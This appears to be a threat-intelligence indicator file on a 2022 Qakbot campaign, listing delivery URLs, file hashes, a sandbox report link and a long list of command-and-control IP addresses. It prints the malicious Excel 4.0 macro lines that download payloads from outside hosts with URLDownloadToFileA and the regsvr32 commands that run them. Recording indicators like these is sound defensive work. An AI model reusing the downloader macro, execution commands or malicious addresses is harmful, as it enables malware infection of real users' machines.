-
Notifications
You must be signed in to change notification settings - Fork 30
/
Copy pathQakbot_AA_11.05.2022.txt
196 lines (179 loc) · 4.53 KB
/
Qakbot_AA_11.05.2022.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
11.05.2022 | Qakbot | AA | Version 403.683 | Campaign | 1649273252
******************************
.url https://contractorandconsulting.com/nroi/iieiasvtrtvtea
.url https://steptoe-and-son.com/man/omdlreoone
.xls 894dad8d458beefec849665e63f6747b7e8f9428636fbacb7e33e8bf23da28d6
.dll b27cdf8db38f91a7af314654023d412ac2044148ebdffcdaccd31cfbff9a4bd8
******************************
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Imchtria", 0)
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Imchtria\Nitubsrta", 0)
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "HTTPS://intconjsc.com/TBFQsJiVAv/Pmnhf.png", "C:\Imchtria\Nitubsrta\Mibyense.OOOOOCCCCCXXXXX")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "HTTPS://ktd-auto.com/vNQEgKwUwti8/Pmnhf.png", "C:\Imchtria\Nitubsrta\Mibyensea.OOOOOCCCCCXXXXX")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "HTTPS://enoktextile.com/hjeBrBwMdY/Pmnhf.png", "C:\Imchtria\Nitubsrta\Mibyenseb.OOOOOCCCCCXXXXX")
https://intconjsc.com/TBFQsJiVAv/Pmnhf.png
https://ktd-auto.com/vNQEgKwUwti8/Pmnhf.png
https://enoktextile.com/hjeBrBwMdY/Pmnhf.png
https://newthinkconectores.com.br/FZayiWyMa/Cbvnh.png
https://trucker.fit/fo8Lwyr0/Cbvnh.png
https://marcioidalino.com.br/czAzb2BcXg/Cbvnh.png
*************************************************
Exec >>
EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\z397139224.xlsb
regsvr32 /s calc
regsvr32 C:\Imchtria\Nitubsrta\Mibyense.OOOOOCCCCCXXXXX
regsvr32 C:\Imchtria\Nitubsrta\Mibyensea.OOOOOCCCCCXXXXX
regsvr32 C:\Imchtria\Nitubsrta\Mibyenseb.OOOOOCCCCCXXXXX
*************************************************
https://tria.ge/220511-pqlqksgdg9
*************************************************
c2's
91.177.173.10:995
176.67.56.94:443
148.0.57.85:443
172.115.177.204:2222
70.46.220.114:443
37.186.54.254:995
24.178.196.158:2222
118.161.15.217:995
46.103.186.43:995
197.89.6.37:443
181.208.248.227:443
103.246.242.202:443
83.110.89.191:443
86.97.246.216:2222
108.60.213.141:443
188.50.241.63:995
47.23.89.60:993
92.132.172.197:2222
78.100.197.230:6883
120.150.218.241:995
86.98.78.177:993
101.51.76.46:443
39.44.86.21:995
74.14.7.71:2222
86.97.8.200:443
84.241.8.23:32103
86.97.246.216:1194
79.129.121.68:995
38.70.253.226:2222
182.191.92.203:995
175.145.235.37:443
185.249.85.200:443
196.203.37.215:80
32.221.224.140:995
197.162.117.38:995
140.82.49.12:443
41.228.22.180:443
75.99.168.194:443
93.48.80.198:995
148.64.96.100:443
86.132.13.91:2078
82.152.39.39:443
41.38.167.179:995
2.50.4.57:443
217.128.122.65:2222
172.114.160.81:995
186.90.153.162:2222
118.161.15.217:443
37.34.253.233:443
2.34.12.8:443
46.107.48.202:443
72.76.94.99:443
124.40.244.118:2222
201.42.3.27:32101
78.100.235.8:2222
76.70.9.169:2222
45.241.145.155:993
203.122.46.130:443
202.134.152.2:2222
75.99.168.194:61201
119.158.122.112:995
183.82.103.213:443
201.210.162.138:2222
173.174.216.62:443
80.11.74.81:2222
86.98.208.214:2222
140.82.63.183:995
149.28.238.199:443
144.202.2.175:995
45.76.167.26:995
144.202.3.39:443
45.63.1.12:995
149.28.238.199:995
140.82.63.183:443
144.202.2.175:443
45.76.167.26:443
144.202.3.39:995
45.63.1.12:443
89.101.97.139:443
103.107.113.84:443
39.44.23.250:995
208.107.221.224:443
76.25.142.196:443
45.46.53.140:2222
121.74.167.191:995
39.52.40.18:995
173.21.10.71:2222
174.69.215.101:443
5.32.41.45:443
73.151.236.31:443
190.252.242.69:443
85.246.82.244:443
82.41.63.217:443
187.208.0.99:443
47.156.191.217:443
70.51.137.64:2222
72.252.157.172:990
72.252.157.172:995
100.1.108.246:443
201.142.133.198:443
102.182.232.3:995
201.1.202.82:32101
40.134.246.185:995
24.139.72.117:443
24.55.67.176:443
179.158.105.44:443
201.172.23.68:2222
90.120.65.153:2078
187.102.135.141:2222
189.146.87.77:443
187.251.132.144:22
191.99.191.28:443
41.215.152.211:995
63.143.92.99:995
186.106.206.47:443
39.49.7.132:995
69.14.172.24:443
109.12.111.14:443
86.195.158.178:2222
189.26.55.114:443
121.7.223.59:2222
58.105.167.36:50000
67.165.206.193:993
187.207.47.198:61202
94.36.195.102:2222
128.106.123.187:443
86.190.159.132:443
103.157.122.130:21
67.209.195.198:443
101.50.67.212:995
106.51.48.170:50001
109.228.220.196:443
88.228.251.169:443
104.34.212.7:32103
181.222.130.143:993
24.152.219.253:995
111.125.245.118:995
39.53.156.127:995
191.251.134.129:443
197.205.106.232:443
103.139.243.207:993
116.30.161.215:995
103.139.243.207:990
39.52.54.195:993
81.215.196.174:443
217.118.46.41:2222
89.86.33.217:443
120.61.3.169:443
2.50.17.128:2222
180.129.20.164:995